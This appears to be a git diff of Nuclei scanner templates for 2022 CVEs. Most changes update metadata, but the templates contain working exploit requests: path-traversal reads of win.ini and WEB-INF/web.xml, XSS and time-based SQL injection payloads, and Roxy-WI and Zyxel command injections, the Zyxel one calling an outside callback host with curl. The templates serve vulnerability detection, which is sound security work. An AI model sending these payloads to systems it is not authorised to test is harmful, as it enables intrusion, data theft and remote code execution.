cve,cve2022,barco,lfi,seclists,packetstorm - -requests: - - raw: - - |+ - GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 - Host: {{Hostname}} - - unsafe: true - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26263.yaml b/nuclei-templates/CVE-2022/CVE-2022-26263.yaml index bd2e2e6c7c..177bda32c5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-26263.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-26263.yaml @@ -6,31 +6,41 @@ info: severity: medium description: | Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Yonyou U8 13.0 application. reference: - https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md - https://nvd.nist.gov/vuln/detail/CVE-2022-26263 + - http://yonyou.com + - https://www.yonyou.com/ + - https://github.com/ARPSyndicate/cvemon classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-26263 - cwe-id: CWE-80 + cwe-id: CWE-79 + epss-score: 0.00147 + epss-percentile: 0.49736 + cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* metadata: verified: true + vendor: yonyou + product: u8\+ google-query: inurl:/u8sl/WebHelp tags: cve,cve2022,yonyou,xss - headless: - steps: - args: url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"%27">()locxss")#javascript:console.log(document.domain)' action: navigate - - action: waitload + - action: waitload matchers: - type: word words: - '

" - "WBCECMS" condition: and - - type: word part: header words: - text/html - - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30489.yaml b/nuclei-templates/CVE-2022/CVE-2022-30489.yaml index fa8e443a15..fa2302aea9 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-30489.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-30489.yaml @@ -1,36 +1,24 @@ id: CVE-2022-30489 - info: - name: Wavlink WN-535G3 - Cross-Site Scripting + name: Wavlink Wn535g3 - POST XSS author: For3stCo1d severity: medium description: | - Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest firmware update provided by the vendor to mitigate this vulnerability. + WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi. reference: - https://github.com/badboycxcc/XSS-CVE-2022-30489 - - https://github.com/badboycxcc/XSS - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 + - https://github.com/badboycxcc/XSS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30489 cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.36947 - cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: wavlink - product: wn535g3_firmware shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,xss,wavlink,router,iot - -http: + verified: "true" + tags: xss,cve2022,wavlink,cve,router,iot +requests: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 @@ -38,7 +26,6 @@ http: Content-Type: application/x-www-form-urlencoded newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn - matchers-condition: and matchers: - type: word @@ -46,13 +33,10 @@ http: - '' - 'parent.location.replace("http://")' condition: and - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a00473045022100e403fa95c8208dca72c7387425cba8c129e7dfa20d8dab4a96911b406fba2cc1022048e179973aa2f40b253ff07bb159c86d5da40b59437535549c3ee912cc28f201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-30512.yaml b/nuclei-templates/CVE-2022/CVE-2022-30512.yaml index 5673f0d940..e98b12e9d8 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-30512.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-30512.yaml @@ -6,20 +6,32 @@ info: severity: critical description: | School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the School Dormitory Management System 1.0. reference: - https://github.com/bigzooooz/CVE-2022-30512 - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2022-30512 + - https://github.com/SYRTI/POC_to_review + - https://github.com/WhooAmii/POC_to_review classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-30512 cwe-id: CWE-89 + epss-score: 0.02624 + epss-percentile: 0.89288 + cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,sqli + verified: true + max-request: 1 + vendor: school_dormitory_management_system_project + product: school_dormitory_management_system + tags: cve,cve2022,sqli,school_dormitory_management_system_project -requests: +http: - method: GET path: - '{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27' @@ -42,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/10/12 +# digest: 4a0a0047304502206d4c2cf954be9043250ab16a537e7ef2675f66c8ba097f50d00faccf56e535f5022100921f7c12c1750864df6c558bcfbaf3b6796d0eeba2782990b6e5755840d26fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-30513.yaml b/nuclei-templates/CVE-2022/CVE-2022-30513.yaml index f2dcf98586..d744e95727 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-30513.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-30513.yaml @@ -6,35 +6,45 @@ info: severity: medium description: | School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability via admin/inc/navigation.php:125. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/bigzooooz/CVE-2022-30513 - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2022-30513 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/trhacknon/Pocingit classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30513 cwe-id: CWE-79 + epss-score: 0.00097 + epss-percentile: 0.39401 + cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2022,xss,authenticated + max-request: 2 + vendor: school_dormitory_management_system_project + product: school_dormitory_management_system + tags: cve2022,cve,xss,authenticated,school_dormitory_management_system_project -requests: +http: - raw: - | POST /dms/admin/login.php?f=login HTTP/1.1 Host: {{Hostname}} username={{username}}&password={{password}} - - | GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1 Host: {{Hostname}} - req-condition: true redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -47,5 +57,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/17 +# digest: 490a00463044022055880a1d2bd6c83c488dd0360a5e4c17e959313d13984eb03f1acbb91d91486e02202fa6c8f1c60e3b6aa7804866b86adead45cd8933590438437a1263b8e20319c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-30514.yaml b/nuclei-templates/CVE-2022/CVE-2022-30514.yaml index f736275b13..70cbd9eb9d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-30514.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-30514.yaml @@ -6,36 +6,45 @@ info: severity: medium description: | School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability in admin/inc/navigation.php:126. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/bigzooooz/CVE-2022-30514 - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30514 - https://nvd.nist.gov/vuln/detail/CVE-2022-30514 + - https://github.com/Marcuccio/kevin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30514 cwe-id: CWE-79 + epss-score: 0.00097 + epss-percentile: 0.39401 + cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2022,xss,authenticated + max-request: 2 + vendor: school_dormitory_management_system_project + product: school_dormitory_management_system + tags: cve,cve2022,xss,authenticated,school_dormitory_management_system_project -requests: +http: - raw: - | POST /dms/admin/login.php?f=login HTTP/1.1 Host: {{Hostname}} username={{username}}&password={{password}} - - | GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1 Host: {{Hostname}} - req-condition: true redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -48,5 +57,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/17 +# digest: 4a0a00473045022100e1cbf9f22134eb78b7d8269338039056f10e9a1d459561bfeb4a4273ceb08d4302203b2f1ddc9b80bac96a44fba68d9c28c248e12ef89a720e1ce2a1921fc0fb9a63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-30525.yaml b/nuclei-templates/CVE-2022/CVE-2022-30525.yaml index 4e8a29bb38..f1fe6f3456 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-30525.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-30525.yaml @@ -1,37 +1,24 @@ id: CVE-2022-30525 - info: name: Zyxel Firewall - OS Command Injection author: h1ei1,prajiteshsingh severity: critical description: | An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system. - remediation: | - Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability. reference: - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ - https://github.com/rapid7/metasploit-framework/pull/16563 - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 - - http://packetstormsecurity.com/files/167176/Zyxel-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-30525 cwe-id: CWE-78 - epss-score: 0.97482 - epss-percentile: 0.99967 - cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: zyxel - product: usg_flex_100w_firmware shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" - tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce - -http: + tags: rce,zyxel,cve,cve2022,firewall,unauth,kev +requests: - raw: - | POST /ztp/cgi-bin/handler HTTP/1.1 @@ -39,15 +26,14 @@ http: Content-Type: application/json {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"} - matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - - type: status status: - 500 -# digest: 4b0a00483046022100d2611a4bbd37c92e10c7c04c5287817c5276dc06e9595aa43f4c7e2d7f9d6f32022100e8b1382edb51ac7f80e2006d4ef501e49d529af2ea63b39cb9842b574f17f6db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-3062.yaml b/nuclei-templates/CVE-2022/CVE-2022-3062.yaml index 7c2de2e73d..f00e70105b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3062.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3062.yaml @@ -6,18 +6,21 @@ info: severity: medium description: | The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 4.4.12 reference: - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a - https://nvd.nist.gov/vuln/detail/CVE-2022-3062 - https://wordpress.org/plugins/simple-file-list/ + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3062 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45913 + epss-score: 0.0012 + epss-percentile: 0.46075 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +28,7 @@ info: vendor: simplefilelist product: simple-file-list framework: wordpress - tags: cve,authenticated,wordpress,wp-plugin,wp,wpscan,cve2022,xss,simple-file-list + tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist http: - raw: @@ -47,4 +50,4 @@ http: - 'contains(body_2, "ee-simple-file-list")' - 'contains(body_2, "onanimationstart=alert(document.domain)//")' condition: and -# digest: 490a0046304402200c8483a6eec6bce3c05ce09a25f4e569fb62d5f5e96565de0eda7e754fe7a49c02207cd555f2a4f74a3d3870df3ef84d5b2c61a184e0de64a474c8dded9ad04d3dff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b8058e2d09fded7acc96d56479398cd66ad473245c9a0aedcd58109aade3dc502204b7c40619880f5fc9c9742dedc31da8c5ec37f59fe121a562c11d2884098bb5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-30777.yaml b/nuclei-templates/CVE-2022/CVE-2022-30777.yaml deleted file mode 100644 index c7b81333ed..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-30777.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-30777 - -info: - name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting - author: 3th1c_yuk1 - severity: medium - description: | - Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. - reference: - - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 - - https://en.wikipedia.org/wiki/H-Sphere - - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30777 - cwe-id: CWE-79 - metadata: - shodan-query: title:"h-sphere" - verified: "true" - tags: cve,cve2022,parallels,hsphere,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: word - words: - - '"><script>alert(document.domain)</script>' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31126.yaml b/nuclei-templates/CVE-2022/CVE-2022-31126.yaml index 9cf66874d7..b411693f94 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31126.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31126.yaml @@ -6,24 +6,32 @@ info: severity: critical description: | Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: Users are advised to upgrade to latest version. reference: - http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html - https://www.cve.org/CVERecord?id=CVE-2022-31137 - https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9 - https://nvd.nist.gov/vuln/detail/CVE-2022-31137 - https://nvd.nist.gov/vuln/detail/CVE-2022-31126 - remediation: Users are advised to upgrade to latest version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-31126 cwe-id: CWE-74 + epss-score: 0.84229 + epss-percentile: 0.98401 + cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: roxy-wi + product: roxy-wi shodan-query: http.html:"Roxy-WI" - verified: "true" - tags: cve,cve2022,rce,unauth,roxy,packetstorm + tags: cve2022,cve,rce,unauth,roxy,packetstorm,roxy-wi -requests: +http: - raw: - | POST /app/options.py HTTP/1.1 @@ -45,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/10/06 +# digest: 4a0a00473045022035556f4f3cd81f9c1bc3e3f30b1581e866314ebc8a754dc6d59d7454b6bd68dd02210091e38ffa5218626fa5a430bdff1748cf16744eb74873df46f70e9fca805896c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31137.yaml b/nuclei-templates/CVE-2022/CVE-2022-31137.yaml deleted file mode 100644 index 918628b773..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-31137.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2022-31137 - -info: - name: Roxy-WI Unauthenticated Remote Code Executions - author: nerrorsec - severity: critical - description: | - Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Versions prior to 6.1.1.0 are subject to a remote code execution vulnerability. - reference: - - https://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html - - https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-31137 - metadata: - shodan-query: http.html:"Roxy-WI" - verified: "true" - tags: cve,cve2022,rce,unauth,roxy,packetstorm - -requests: - - raw: - - | - POST /app/options.py HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bnetstat+-p+%23%23&backend_server=127.0.0.1 - - matchers: - - type: word - condition: and - part: body - words: - - "Local Address" - - "Foreign Address" - - "State" diff --git a/nuclei-templates/CVE-2022/CVE-2022-31268.yaml b/nuclei-templates/CVE-2022/CVE-2022-31268.yaml deleted file mode 100644 index b8148bb605..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-31268.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2022-31268 - -info: - name: Gitblit 1.9.3 - Local File Inclusion - author: 0x_Akoko - severity: high - description: | - Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). - reference: - - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md - - https://vuldb.com/?id.200500 - - https://nvd.nist.gov/vuln/detail/CVE-2022-31268 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-31268 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"Gitblit" - verified: "true" - tags: cve,cve2022,lfi,gitblit - -requests: - - method: GET - path: - - "{{BaseURL}}/resources//../WEB-INF/web.xml" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "</web-app>" - - "java.sun.com" - - "gitblit.properties" - condition: and - - - type: word - part: header - words: - - "application/xml" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31269.yaml b/nuclei-templates/CVE-2022/CVE-2022-31269.yaml index 1bd23f8fd2..5c4f56238d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31269.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31269.yaml @@ -6,22 +6,33 @@ info: severity: high description: | Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the device. + remediation: | + Apply the latest firmware update provided by the vendor to fix the vulnerability. reference: - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html - https://www.nortekcontrol.com/access-control/ - https://eg.linkedin.com/in/omar-1-hashem - https://nvd.nist.gov/vuln/detail/CVE-2022-31269 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N cvss-score: 8.2 cve-id: CVE-2022-31269 cwe-id: CWE-798 + epss-score: 0.00231 + epss-percentile: 0.6049 + cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: nortekcontrol + product: emerge_e3_firmware shodan-query: http.title:"Linear eMerge" - verified: "true" - tags: cve2022,emerge,exposure,packetstorm,cve + tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol -requests: +http: - method: GET path: - "{{BaseURL}}/test.txt" @@ -47,5 +58,4 @@ requests: - type: regex regex: - Password='(.+?)' - -# Enhanced by md on 2023/02/03 +# digest: 4a0a004730450220211b8b052d35c8c0e6a761490e6c1b685d1d56b894054fd40f62eb2b07c5ffa8022100a1cd1709ff09731bac0575fa634a80cf43322d879c77cd786771c0de881a2f50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31299.yaml b/nuclei-templates/CVE-2022/CVE-2022-31299.yaml index 9350d2e4c8..c2e724eac2 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31299.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31299.yaml @@ -6,20 +6,32 @@ info: severity: medium description: | Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/bigzooooz/CVE-2022-31299 - https://angtech.org - https://nvd.nist.gov/vuln/detail/CVE-2022-31299 + - https://angtech.org/product/view/3 + - https://github.com/trhacknon/Pocingit classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-31299 cwe-id: CWE-79 + epss-score: 0.00209 + epss-percentile: 0.58245 + cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,haraj,xss + verified: true + max-request: 1 + vendor: angtech + product: haraj + tags: cve,cve2022,haraj,xss,angtech -requests: +http: - method: GET path: - "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1¬e=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" @@ -41,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/22 +# digest: 490a004630440220107082951fb57d51f08b7e519d2eddac32a210758fa0a1e697b5481071bcdf4d0220106c1631d6f85f20235fddd9930929c3bd344de8de936b4a700dd0e93f9d9912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml b/nuclei-templates/CVE-2022/CVE-2022-31373.yaml index 8c1c21231b..c09b86777f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31373.yaml @@ -1,11 +1,10 @@ id: CVE-2022-31373 - info: - name: SolarView Compact 6.00 - Cross-Site Scripting + name: SolarView Compact 6.00 - Cross-Site Scripting(XSS) author: ritikchaddha severity: medium description: | - SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php. reference: - https://github.com/badboycxcc/SolarView_Compact_6.0_xss - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 @@ -18,28 +17,20 @@ info: shodan-query: http.html:"SolarView Compact" verified: "true" tags: cve,cve2022,xss,solarview - requests: - method: GET path: - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word part: body words: - '/Solar_AiConf.php/"><script>alert(document.domain)</script>' - - 'HREF="Solar_Service.php"' - condition: and - - type: word part: header words: - "text/html" - - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/CVE-2022-3142.yaml b/nuclei-templates/CVE-2022/CVE-2022-3142.yaml index 5a741267d5..32a47a3e0f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3142.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3142.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-3142 cwe-id: CWE-89 - epss-score: 0.00318 - epss-percentile: 0.67196 + epss-score: 0.00356 + epss-percentile: 0.71515 cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: product: nex-forms framework: wordpress publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ - tags: wpscan,packetstorm,cve,cve2022,wordpress,sqli,wp-plugin,wp,authenticated + tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline http: - raw: @@ -40,15 +40,15 @@ http: log={{username}}&pwd={{password}}&wp-submit=Log+In - | @timeout: 30s - GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1 + GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - 'status_code_2 == 200' - 'contains(body_2, "NEX-Forms")' - 'contains(content_type_2, "text/html")' condition: and -# digest: 